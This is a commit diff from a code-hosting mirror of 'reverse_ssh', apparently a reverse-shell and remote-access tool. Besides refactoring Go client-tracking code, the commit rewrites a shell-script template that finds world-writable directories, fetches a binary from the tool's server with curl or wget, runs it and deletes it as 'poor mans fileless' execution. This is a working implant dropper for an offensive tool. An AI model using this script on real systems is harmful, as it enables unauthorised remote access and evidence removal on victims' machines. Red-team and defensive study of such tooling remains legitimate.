crash.software
Projects
Pull Requests
Issues
Builds
reverse_ssh
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY reverse_ssh Commits b4168b87
🤬

  • Improve shell script to find world writable directories

  • Loading...
  • NHAS committed 2 years ago
    b4168b87
    1 parent 9f91bcdb
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    internal/server/clients/clients.go
    skipped 11 lines
    12 12   "golang.org/x/crypto/ssh"
    13 13  )
    14 14   
    15  -var lock sync.RWMutex
    16  -var clients = map[string]*ssh.ServerConn{}
     15 +var (
     16 + lock sync.RWMutex
     17 + clients = map[string]*ssh.ServerConn{}
     18 + uniqueIdToAllAliases = map[string][]string{}
     19 + aliases = map[string]map[string]bool{}
    17 20   
    18  -var Autocomplete = trie.NewTrie()
     21 + Autocomplete = trie.NewTrie()
    19 22   
    20  -var usernameRegex = regexp.MustCompile(`[^\w-]`)
    21  - 
    22  -var uniqueIdToAllAliases = map[string][]string{}
    23  -var aliases = map[string]map[string]bool{}
     23 + usernameRegex = regexp.MustCompile(`[^\w-]`)
     24 +)
    24 25   
    25 26  func NormaliseHostname(hostname string) string {
    26 27   hostname = strings.ToLower(hostname)
    skipped 39 lines
    66 67   
    67 68  }
    68 69   
    69  -func GetAll() map[string][]string {
    70  - lock.RLock()
    71  - defer lock.RUnlock()
    72  - 
    73  - out := map[string][]string{}
    74  - 
    75  - for id := range uniqueIdToAllAliases {
    76  - out[id] = uniqueIdToAllAliases[id]
    77  - }
    78  - 
    79  - return out
    80  -}
    81  - 
    82 70  func Search(filter string) (out map[string]*ssh.ServerConn, err error) {
    83 71   
    84 72   filter = filter + "*"
    85 73   _, err = filepath.Match(filter, "")
    86 74   if err != nil {
    87  - return nil, fmt.Errorf("Filter is not well formed")
     75 + return nil, fmt.Errorf("filter is not well formed")
    88 76   }
    89 77   
    90 78   out = make(map[string]*ssh.ServerConn)
    skipped 63 lines
    154 142   
    155 143   }
    156 144   
    157  - return nil, fmt.Errorf("%s Not found.", identifier)
     145 + return nil, fmt.Errorf("%s not found", identifier)
    158 146  }
    159 147   
    160 148  func Remove(uniqueId string) {
    skipped 26 lines
  • ■ ■ ■ ■ ■ ■
    internal/server/webserver/shellscripts/templates/sh
    1 1  #!/bin/bash
     2 +export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/bin:/bin:/sbin
     3 + 
     4 + 
     5 +LOCATIONS=("~" ".")
     6 +LOCATIONS+=($(find / -maxdepth 3 -type d \( -perm -o+w \)))
    2 7   
    3  -if which curl >/dev/null; then
    4  -curl {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}} -o {{.Name}}
    5  -elif which wget >/dev/null; then
    6  -wget -O {{.Name}} {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}
    7  -fi
     8 +for i in "${LOCATIONS[@]}"; do
    8 9   
    9  -chmod +x {{.Name}}
    10  -./{{.Name}}
    11  -#Poor mans fileless
    12  -rm ./{{.Name}}
     10 + if ! touch $i/{{.Name}}; then
     11 + continue
     12 + fi
     13 + 
     14 + if which curl >/dev/null; then
     15 + curl {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}} -o $i/{{.Name}}
     16 + elif which wget >/dev/null; then
     17 + wget -O $i/{{.Name}} {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}
     18 + fi
     19 + 
     20 + chmod +x $i/{{.Name}}
     21 + if ! $i/{{.Name}}; then
     22 + continue
     23 + fi
     24 + #Poor mans fileless
     25 + rm $i/{{.Name}}
     26 + 
     27 + break
     28 +done
Please wait...
Page is in error, reload to recover